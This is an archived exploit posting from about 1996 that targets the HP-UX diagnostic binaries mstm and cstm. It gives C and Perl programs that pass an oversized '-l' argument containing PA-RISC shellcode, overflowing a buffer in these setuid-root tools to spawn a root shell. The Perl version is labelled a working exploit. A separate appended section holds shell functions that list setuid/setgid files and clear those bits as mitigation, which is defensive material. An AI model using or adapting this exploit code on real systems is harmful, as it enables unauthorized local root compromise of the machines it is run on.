SOD /usr/diag/bin/[cm]stm buffer overflow

Summary
Description: Standard buffer overflow
Author: Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems: HP/UX with vulnerable [cm]stm, probably 9.x and 10.x
Date: November 1996
Notes: See the SOD HP Bug of the Week page
Details

Exploit:

/* SOD /usr/diag/bin/[cm]stm buffer overflow */

#include <string.h>   /* strcpy */
#include <unistd.h>   /* execl */

int main(void)
{
char buf[500];        /* overflow payload built below; well within 500 bytes */

strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");

execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
/* Either-or, same overflow */
execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
return 0;
}

And here it is in Perl:

#!/usr/bin/perl

# working exploit for 9.X setuid root /usr/diag/bin/[cm]stm

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

$code="AA"; # two byte alignment

$code.=h2cs("34010102"); # ldi 129,r1
$code.=h2cs("08220401"); # sub rp,r1,r1
$code.=h2cs("602002a6"); # stb r0,339(r1)
#$code.=h2cs("602002ac"); # stb r0,342(r1)
$code.=h2cs("b43a0298"); # addi 332,r1,arg0
$code.=h2cs("34160176"); # ldi 187,r22
$code.=h2cs("34010276"); # ldi 315,r1
$code.=h2cs("08360216"); # and r22,r1,r22
$code.=h2cs("20200801"); # ldil l%c0000004,r1
$code.=h2cs("e420e008"); # ble 4(sr7,r1)
$code.=h2cs("08210280"); # NOP == xor r1,r1,r0
#$code.=h2cs("deadcafe"); # illegal instruction
$num=208-length($code);
$code.="C"x$num;

$data="/bin/sh.sh.";
$num=16-length($data);
$data.="D"x$num;

$num=224-length($of);
$of=$code.$data;
$of.=h2cs("7b03301B");
print "Length is: ",length($of),"\n";
exec("/usr/diag/bin/mstm","-l","$of");
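Both exploits above depend on the diagnostic binaries being setuid root (the Perl comment says so explicitly): a long "-l" argument overflows a buffer, and the setuid bit is what turns that into a root shell. The shell functions below are an added defender-side example, not part of the SOD posting or of Fyodor's archive. They audit a directory for setuid/setgid files and clear the bits on a named file; the directory /usr/diag/bin comes from the page, the function names and the report/fix behaviour are my own, and the script assumes a POSIX sh with find, chmod and test -u/-g.

```shell
#!/bin/sh
# Added example, not part of the SOD posting: audit and mitigation helpers for
# setuid/setgid binaries such as /usr/diag/bin/mstm and cstm (paths from the page).
# Assumes a POSIX sh with find, chmod and test -u / -g. Clearing the bits means
# only root can run the tools until a fixed version is installed.

# is_setuid FILE : succeed if FILE carries the setuid or setgid bit
is_setuid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# list_setuid DIR : print every regular file under DIR with setuid or setgid set,
# in ls -l form, so the list can be reviewed before anything is changed
list_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \;
}

# count_setuid DIR : number of such files under DIR (a baseline figure to compare
# against after patching or after a suspicious change)
count_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) | wc -l | tr -d ' '
}

# drop_setuid FILE : clear setuid and setgid on FILE and verify the change took
drop_setuid() {
    chmod u-s,g-s "$1" && ! is_setuid "$1"
}

# audit_dir DIR [fix] : report setuid/setgid files under DIR; with "fix" as the
# second argument, also clear the bits on each of them.
# Usage: audit_dir /usr/diag/bin        (report only)
#        audit_dir /usr/diag/bin fix    (report and clear)
audit_dir() {
    dir=$1
    mode=${2-report}
    list_setuid "$dir"
    if [ "$mode" = fix ]; then
        find "$dir" -type f \( -perm -4000 -o -perm -2000 \) -exec sh -c '
            for f in "$@"; do
                chmod u-s,g-s "$f" && echo "cleared setuid/setgid on $f"
            done' sh {} +
    fi
}

# When run as a script, treat the arguments as DIR [fix]; when sourced, just
# define the functions.
if [ $# -gt 0 ]; then
    audit_dir "$@"
fi
```

Run it in report mode first and keep the output as a baseline; the count function makes a before/after comparison trivial, and the fix mode is deliberately limited to clearing bits rather than deleting or replacing binaries, so it can be reversed with chmod if a tool turns out to be needed by non-root users.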


This page is part of Fyodor's exploit world.